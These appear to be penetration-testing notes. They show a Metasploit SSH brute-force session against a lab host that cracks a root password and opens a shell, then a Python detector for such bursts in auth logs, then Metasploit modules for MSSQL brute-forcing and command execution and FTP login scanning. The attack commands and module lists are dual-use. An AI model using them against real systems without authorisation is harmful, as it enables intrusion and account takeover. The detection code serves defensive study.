msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 16
THREADS => 16
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.1.251:22 - Failed: 'root:'
[-] 192.168.1.251:22 - Failed: 'root:!root'
[-] 192.168.1.251:22 - Failed: 'root:Cisco'
[-] 192.168.1.251:22 - Failed: 'root:NeXT'
..............[too many lines, trimmed by hand]................
[-] 192.168.1.251:22 - Failed: 'root:letmein'
[-] 192.168.1.251:22 - Failed: 'root:powerapp'
[-] 192.168.1.251:22 - Failed: 'root:dbps'
[-] 192.168.1.251:22 - Failed: 'root:ibm'
[-] 192.168.1.251:22 - Failed: 'root:monitor'
[-] 192.168.1.251:22 - Failed: 'root:turnkey'
[-] 192.168.1.251:22 - Failed: 'root:vagrant'
[+] 192.168.1.251:22 - Success: 'root:a' ''
[*] Command shell session 1 opened (192.168.1.254:32825 -> 192.168.1.251:22) at 2020-02-11 17:54:22 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
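Seen from the target's sshd, the ssh_login run above produces a burst of "Failed password for root" lines followed by one "Accepted password". An added example (not from the original notes) that raises an alert on the burst and, separately, on the password login that follows it, over constructed auth.log lines; the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log lines modelling what sshd on 192.168.1.251 would record
# while the ssh_login run above guesses root passwords from 192.168.1.254.
SAMPLE = [f"Feb 11 17:54:{s:02d} target sshd[{1000 + s}]: Failed password for root "
          f"from 192.168.1.254 port {32800 + s} ssh2" for s in range(22)] + [
    "Feb 11 17:54:22 target sshd[1022]: Accepted password for root from 192.168.1.254 port 32825 ssh2",
    "Feb 11 17:55:01 target sshd[1030]: Failed password for invalid user admin from 192.168.1.254 port 32830 ssh2",
    "Feb 11 17:56:00 target sshd[1040]: Accepted publickey for deploy from 192.168.1.10 port 50000 ssh2",
]

LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"(Failed|Accepted) (password|publickey) for (?:invalid user )?(\S+) from (\S+) port \d+")
FAILS = 10      # failures from one source within WINDOW seconds -> brute-force alert
WINDOW = 60     # thresholds are this example's choice, not a Metasploit or sshd setting

def parse(line, year=2020):
    """Return the fields of one sshd auth line, or None. Syslog lines carry
    no year, so one is supplied (assumption: the log is from 2020)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return {"t": ts.timestamp(), "result": m.group(2), "method": m.group(3),
            "user": m.group(4), "src": m.group(5)}

def detect(lines):
    """Return alerts as (kind, src, user). brute-force fires once per source;
    success-after-failures fires for each password login that follows
    recent failures from the same source."""
    alerts, fired = [], set()
    fails = defaultdict(list)          # src -> [t of failed attempts in window]
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        src = e["src"]
        fails[src] = [t for t in fails[src] if t > e["t"] - WINDOW]
        if e["result"] == "Failed":
            fails[src].append(e["t"])
            if ("brute-force", src) not in fired and len(fails[src]) >= FAILS:
                fired.add(("brute-force", src))
                alerts.append(("brute-force", src, e["user"]))
        elif e["method"] == "password" and fails[src]:
            # the guess that worked; this is the one that needs a response
            alerts.append(("success-after-failures", src, e["user"]))
    return alerts

def users_tried(lines):
    """Distinct usernames attempted per source: one account being hammered
    (as here) versus a spray across many."""
    out = defaultdict(set)
    for line in lines:
        e = parse(line)
        if e and e["result"] == "Failed":
            out[e["src"]].add(e["user"])
    return {k: sorted(v) for k, v in out.items()}
```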
- Collecting missing Windows patches
- Checked from a session that has already been obtained.
- post/windows/gather/enum_patches
- MSSQL: TCP 1433 (dynamic port) / UDP 1434 (used to look up the TCP port number)
- Service detection: auxiliary/scanner/mssql/mssql_ping
- Password brute-forcing: auxiliary/scanner/mssql/mssql_login
- Remote code execution: auxiliary/admin/mssql/mssql_exec
- FTP scanning
- auxiliary/scanner/ftp/ftp_version
- auxiliary/scanner/ftp/ftp_login
- auxiliary/scanner/ftp/anonymous